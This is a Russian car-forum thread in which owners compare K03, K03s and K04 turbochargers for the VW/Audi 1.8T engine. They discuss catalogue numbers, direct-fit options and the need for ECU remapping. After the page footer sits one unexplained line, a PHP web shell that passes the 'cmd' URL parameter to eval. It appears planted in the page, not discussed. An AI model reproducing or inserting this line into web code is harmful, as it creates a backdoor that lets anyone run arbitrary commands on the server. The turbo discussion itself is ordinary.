+ Ответить в теме
Страница 1 из 4 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 31

Тема: Расскажите про различия турбин К03, К03s, K04


  1. #1
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739

    Расскажите про различия турбин К03, К03s, K04

    Перерыл весь форум, пользовался поиском, ничего не нашел, в очередной раз убедился что нужен полный ФАК :)

    Чувствую что в будущем году буду менять турбину, на серьезный проект пока денех все равно нету, но вот интересно, что за разница между этими тремя моделями и все ли они ставятся в штатное место?

    Спасибо заранее, Пух!
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  2. #2
    GTI-Racing Танкист is on a distinguished road Аватар для Танкист
    Регистрация
    18.03.2008
    Откуда
    Край Краснодарский
    Машина
    GOLF 4 GTI
    Сообщений
    598
    Поищи графики хотяб мощностных стендов на этих турбах там все будет тебе видно и понятно! Или ты интересуешься техническим отличием турбин???
    Изображения

  3. #3
    GTI-Racing Танкист is on a distinguished road Аватар для Танкист
    Регистрация
    18.03.2008
    Откуда
    Край Краснодарский
    Машина
    GOLF 4 GTI
    Сообщений
    598
    вот отличие компрессорной части к03 от к04
    Изображения
    Последний раз редактировалось Танкист; 18.11.2009 в 15:40.

  4. #4
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739
    Меня интересует вот что, могу ли я поставить на мой носок К03s или К04 заместо К03, и какая разница будет между ними, ну навскидку, что бы искать показания мощностных стендов надо копать нет, на это времени столько пока нету :(

    А, и еще, 03с и 04 встают без переделок, в штатные места?
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  5. #5
    GTI-Racing Танкист is on a distinguished road Аватар для Танкист
    Регистрация
    18.03.2008
    Откуда
    Край Краснодарский
    Машина
    GOLF 4 GTI
    Сообщений
    598
    03c да эта турба идет на GOLF GTI и JETTA GLI т.е. 180л.с. вместо 03 150л.с. в стоке!!!

    К04-01 станет тоже в штатное место...

  6. #6
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739
    Цитата Сообщение от Танкист Посмотреть сообщение
    03c да эта турба идет на GOLF GTI и JETTA GLI т.е. 180л.с. вместо 03 150л.с. в стоке!!!

    К04-01 станет тоже в штатное место...
    А программу переписывать тоже нужно будет?
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  7. #7
    GTI-Racing Танкист is on a distinguished road Аватар для Танкист
    Регистрация
    18.03.2008
    Откуда
    Край Краснодарский
    Машина
    GOLF 4 GTI
    Сообщений
    598
    Да............................................

  8. #8
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от daToxa Посмотреть сообщение
    Меня интересует вот что, могу ли я поставить на мой носок К03s или К04 заместо К03, и какая разница будет между ними, ну навскидку, что бы искать показания мощностных стендов надо копать нет, на это времени столько пока нету :(

    А, и еще, 03с и 04 встают без переделок, в штатные места?
    1) У тебя стоит К03.

    2) Буквы "s" нет в паспорте фирмы ККК.
    "s" это бытовуха которой называют 180-ти сильную версию
    по каталогу это номера:
    K03-026 и K03-035 и K03-052

    отличие от К03 в иной несколько форме крыльчатки и другому вестгейту с более жесткой пружиной

    3) K04-001 (поперечный мотор) и K04-015 (продольный мотор) встанут на штатное место Гольфа и Ауди соответственно. Плюсы........ да они в целом не сильно лучше К03s. С программой покажут немного большую мощность, но как пишут по тяге даже не сильно так ярко выражено т.е. эластичность у К03 факин "s" не хуже и даже интересней, особенно если К03s тоже с чипом.

    4) "настоящие улитки" К04 от Ауди ТТ не встанут на 1.8Т без переделки.
    Это улитки: K04-020 и 022 и 023
    Список расходников и заменяемых деталей более десятка. Форсунки, коллектор и т.д............ Kirill_GTI делал так и есть его тема на форуме.
    Получаемая мощность после перепрошивки наибольшая среди всех вариантов мудрения с КККашками.

    5) отличный выбор без должного гемора гибрид К03\К04. Мощность меньше, но и возни меньше

    Цитата Сообщение от daToxa Посмотреть сообщение
    А программу переписывать тоже нужно будет?
    желательно чтобы реализовать себе всю мощность такого апгрейда........... но если ты к вопросу заведется или нет если тупо поменять улитку - заведется.
    песок сыпется....не останавливайтесь на достигнутом !

  9. #9
    GTI-Racing Pavlo is a jewel in the rough Pavlo is a jewel in the rough Pavlo is a jewel in the rough Pavlo is a jewel in the rough Аватар для Pavlo
    Регистрация
    16.07.2009
    Откуда
    Москва
    Машина
    Mk4 GTI '99, Passat CC DSG '11
    Сообщений
    1,073
    Bon, а какие GT можно поставить на гольфа то, конечно и ежу понятно, но мне номерки бы точные для поиска, заранее спасибо

    Добавлено через 26 минут
    Код:
    http://www.turbo3k.com/catalogue/stn-5304_988_0015/
    вот здесь мона покапаться:)
    Последний раз редактировалось Pavlo; 19.11.2009 в 17:25. Причина: Добавлено сообщение

  10. #10
    GTI-Racing mas1er is on a distinguished road Аватар для mas1er
    Регистрация
    08.09.2006
    Откуда
    Краснодар
    Машина
    mk4
    Сообщений
    1,405
    я читал на киевском форуме, да там и графики, что к04-001 под штатный коллектор интереснее гибрида к03\04, и на мах обороты выходит раньше, меньше турбояма
    '02mk4 GTi st1 * Forge007 DV * WEITEC coilovers * 312 * R32 sway bar продан
    '12mk6 GTi MT APR * Carbonio intake * Neuspeed Turbo Outlet pipe * Eibach Sportline

+ Ответить в теме
Страница 1 из 4 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. Для Г4 1.8Т, две К03S, выпускной коллектор, свв, расходомер и др.
    от Hot_ice в разделе Покупка и продажа запчастей
    Ответов: 8
    Последнее сообщение: 22.06.2013, 01:52
  2. Различия 1.8т
    от ALEX73 в разделе Двигатель
    Ответов: 4
    Последнее сообщение: 21.09.2010, 12:46
  3. Расскажите О 5 Гти
    от ooomtc в разделе Отзывы / Выбор
    Ответов: 25
    Последнее сообщение: 18.04.2009, 20:42

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}